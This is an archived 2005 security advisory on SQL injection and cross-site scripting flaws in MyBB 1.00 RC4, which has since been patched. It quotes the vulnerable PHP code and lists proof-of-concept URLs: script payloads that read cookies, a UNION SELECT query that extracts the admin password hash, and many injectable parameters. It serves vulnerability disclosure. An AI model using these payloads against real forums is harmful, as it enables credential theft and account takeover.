what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

codebug-7.txt

codebug-7.txt
Posted Aug 14, 2005
Authored by Alberto Trivero | Site codebug.org

Multiple SQL injection and cross site scripting bugs have been discovered in MyBB 1.00 RC4.

tags | exploit, xss, sql injection
SHA-256 | 1a88cd902008b46e3b8e263d846464c7659ed8471f0507f7db50c50886d61a0e

codebug-7.txt

Change Mirror Download
**********************************************************************
* CODEBUG Labs
* Advisory #7
* Title: Multiple vulnerabilities in MyBulletinBoard (MyBB) 1.00 RC4
* Author: Alberto Trivero
* English Version: Alberto Trivero
* Product: MyBulletinBoard 1.00 RC4
* Type: Multiple Vulnerabilities
* Web: https://www.codebug.org/
**********************************************************************


--) Software Page (www.mybboard.com)

"MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. MyBB has
been designed with the end users in mind, you and your subscribers. Full control over your
discussion system is presented right at the tip of your fingers, from multiple styles and
themes to the ultimate customisation of your forums using the template system."


--) Cross-Site Scripting (XSS)

Let's look at code from misc.php at line 310:

<?
...
$url = $settings['bburl']."/rss.php";
if(!$all)
{
$url .= "?fid=$syndicate";
$add = 1;
}
if($version != "rss")
{
if(!$add)
{
$url .= "?";
}
else
{
$url .= "&";
}
$url .= "type=$version";
$add = 1;
}
if($limit)
{
if($limit > 100)
{
$limit = 100;
}
if(!$add)
{
$url .= "?";
}
else
{
$url .= "&";
}
$url .= "limit=$limit";
}
...
?>

This piece of code has the task of complete the $url variable that will print as is in the
result page. All the variables that compose the URL ($syndicate (note line 305: $syndicate
.= $comma.$fid), $version, $limit) can be controlled by a remote user and when MyBB take
the value doesn't sanitise properly it. So it's possible to perform a Cross-Site Scripting
attack by sending some requests like these (one for every variable):

https://www.example.com/mybb/misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/misc.php?action=syndication&forums[0]=0&version=%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/misc.php?action=syndication&limit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Unfortunately for this board, there are many others parameters that doesn't check properly
if someone inject some HTML maliciuos code, or other:

https://www.example.com/mybb/forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/member.php?agree=I+Agree&username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/member.php?agree=I+Agree&email=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/member.php?agree=I+Agree&email2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/memberlist.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/memberlist.php?usersearch=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/showthread.php?mode=linear&tid=1&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/showthread.php?mode=linear&tid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://www.example.com/mybb/printthread.php?tid=1%3Cscript%3Ealert(document.cookie)%3C/script%3E


--) SQL Injection

Let's look at code from calendar.php at line 54:

<?
...
if($action == "event")
{
$query = $db->query("SELECT e.*, u.username, g.namestyle FROM ".TABLE_PREFIX."events e LEFT JOIN ".TABLE_PREFIX."users u ON (e.author=u.uid) LEFT JOIN ".TABLE_PREFIX."usergroups g ON (u.usergroup=g.gid) WHERE e.eid='$eid'");
...
?>

What we are seeing is a query to the SQL DB for create the result page with the correct
data from the calendar. The problem occurs becouse the $eid parameter in the WHERE clause
is put in the SQL query with any sanitisation before, so a malicious user will be able to
do an SQL injecion attack to the database for obtain what he want.
This is a proof of concept exploit that it's able to show the MD5 hash of the password of
the board's administrator:

https://www.example.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/*

Unfortunately (or fortunately, by the point of view) this PoC doesn't work on all the
versions and configurations of MySQL Database.
For automate the explotation process I've made with FAiN182 a Perl exploit here
available:
As for the XSS attack before, also for the SQL injection attack, there are many
vulnerables parameters. These are the most important:

https://www.example.com/mybb/online.php?pidsql=)[sql_query]
https://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query]
https://www.example.com/mybb/editpost.php?pid='[sql_query]
https://www.example.com/mybb/forumdisplay.php?fid='[sql_query]
https://www.example.com/mybb/newreply.php?tid='[sql_query]
https://www.example.com/mybb/search.php?action=results&sid='[sql_query]
https://www.example.com/mybb/showthread.php?tid='[sql_query]
https://www.example.com/mybb/showthread.php?pid='[sql_query]
https://www.example.com/mybb/usercp2.php?tid='[sql_query]
https://www.example.com/mybb/printthread.php?tid='[sql_query]
https://www.example.com/mybb/reputation.php?pid='[sql_query]
https://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
https://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query]
https://www.example.com/mybb/ratethread.php?tid='[sql_query]


--) Patch

Thanks to Chris Boulton, main developer on MyBB, for the release of the patchs,
availables at this address: https://www.mybboard.com/community/showthread.php?tid=2559


**********************************************************************
* https://www.codebug.org/
**********************************************************************
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close